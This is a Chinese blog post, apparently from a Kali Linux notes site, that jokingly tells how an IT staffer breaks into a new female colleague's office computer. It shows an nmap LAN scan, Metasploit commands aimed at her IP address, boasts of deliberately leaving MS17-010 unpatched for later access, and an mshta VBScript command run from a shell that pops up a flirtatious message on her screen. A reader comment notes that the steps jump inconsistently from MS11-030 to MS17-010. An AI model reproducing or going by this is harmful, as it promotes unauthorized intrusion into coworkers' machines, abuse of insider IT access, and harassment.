今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。
温馨提示
拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦!
信息收集
幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。
作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。
废话不说,神器nmap走一波
nmap -p0 192.168.123.1/24
ok,确定了目标。现在对目标进行漏洞扫描。
对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。
针对存在的漏洞进行攻击
查看漏洞详细信息
拿出神器msf
搜索漏洞模块
search MS11-030
use auxiliary/dos/windows/llmnr/ms11_030_dnsapi
set RHOSTS 192.168.123.66
当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面……
不以调戏为目标的渗透都不叫渗透
进入shell命令下,执行下面命令:
mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close)不以勾引为目标的渗透都不叫渗透
作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功走向人生的巅峰。
Kali笔记
4 comments
11-030突然变成了远程命令执行的17-010
好活
你采用的是什么方法进行的漏洞扫描
nessus安装教程参考文章 >https://bbskali.cn/thread-2013-1-1.html